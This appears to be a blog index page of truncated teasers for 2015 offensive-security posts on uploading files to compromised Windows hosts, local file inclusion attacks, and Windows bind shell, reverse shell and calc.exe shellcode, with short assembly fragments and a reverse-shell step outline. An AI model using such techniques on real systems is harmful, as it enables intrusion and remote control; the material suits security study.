Uploading files to compromised systems

Written by  on October 21, 2015

The Windows debug method: Windows has a program called debug. This program can actually convert hex machine code to an executable or whatever. The windows[...]

LFI: beyond /proc/self/environ

Written by  on October 19, 2015

Let’s suppose that we have a simple PHP application. The web app has a login form and a small news system based on txt files. So a user can simple[...]

Windows bind shell universal shellcode

Written by  on September 26, 2015

.386 .model flat,stdcall .data .code start: assume fs:nothing ; ———————————————— ;[...]

Windows reverse shell universal shellcode

Written by  on August 29, 2015

Here it goes: 1) resolve needed functions from kernel32 and push them on the stack 2) load & initialize the Winsock library 3) create a socket and connect[...]

WinExec calc.exe universal shellcode

Written by  on August 21, 2015

ASM: PUSH ESI ; LOCATE KERNEL32 BASE ADDR XOR EAX,EAX MOV EAX,DWORD PTR FS:[EAX+30] MOV EAX,DWORD PTR DS:[EAX+C] MOV ESI,DWORD PTR DS:[EAX+1C] LODS DWORD[...]